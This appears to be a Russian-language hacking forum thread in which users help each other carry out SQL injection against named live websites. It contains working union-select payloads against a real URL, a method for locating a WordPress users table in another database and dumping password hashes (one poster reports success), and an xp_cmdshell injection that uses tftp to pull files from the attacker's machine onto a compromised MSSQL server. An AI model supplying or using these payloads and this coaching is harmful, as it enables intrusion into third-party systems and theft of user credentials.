Ваши вопросы по уязвимостям.

Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_schema.tables--

 

Чар тебе в помощь.

 

чар тоже не работает)), как быть?

 

можно ли пролезть вот в такую багу сайта?
http://www.hotindex.ru/Details.aspx?id=6927

 

Багом назвать это трудно конечно...

 

Первое поле нормально выводится:

http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+table_name,null,null+from+information_schema.tables--

нельзя, это не баг

 

помогите.. через mysql подобрал таблицы и колонки нашел таблицу wp_users запросом через information_schema в ней через information_schema.columns намел калонку user_pass и user_name вообщем все что нужно для счастья. но при запросе 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+wp_users -- пишет Table 'hoys.wp_users' doesn't exist и ошибки тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?

 

Ghost0ff Она в другой базе, это 1000000 раз разбиралось, последний раз вчера в этой-же теме

О_o Какой ещё логин?

 

1) Ищем что такое на самом деле hoys:

+union+select+1,table_schema,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name='wp_users'--

Допустим вывело на экран "forum", тогда твой запрос будет такой:

2) 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+forum.wp_users --

 

Я тебе без вяких поисков скажу, это база с которой работает скрипт
(только тсссс, это превад инфа)

 

О! все выбил хэш. Спасибо большое. +1. впредь глупых вопросов забавать не буду

 

Есть sql server с правами SA. Через xp_cmdshell телнетится с него куда-либо не могу , но могу пинговать. Как можно внешний ip этого sql сервера пробить. К примеру у меня есть дедик (WIN). Что можно на него заинсталить, чтоб оно отображало кто пингует? ТОлько простенькое, файр туда ставить не хочется

 

SHS, ставь сниффер

 

Cain & Abel сойдет? И где там палить эти пакеты.

 

Хз, каина не юзал. Юзал вот это:

или

 

Пробну через Ettercap пожалуй.

 

Не вышло чет, мб я что-либо сделал неправильно. Жду советов. Желательно по конкретнее что да как )

 

Скачивай tftp сервер (http://tftpd32.jounin.net/tftpd32_download.html), запускай на своем компе, указав папку, из которой будут закачиваться файлы на удаленный сервер. Теперь выполняй команду через инъекцию:
;exec master..xp_cmdshell 'tftp -i [твой ip] GET [любой файл из папки] [путь нового файла]'--
например
;exec master..xp_cmdshell 'tftp -i 12.34.56.78 GET blabla.txt C:\blabla.txt'--
Во время закачивания файл на удаленный сервер, можно видеть список активных подключений. Во вкладке Log viewer также можно увидеть адреса всех клиентов.

 

палевно все-таки к своему айпи конектица...

 

Да вот в том то и дело, что кроме пинга я ничего не могу делать (видать файр, ито не стандартный).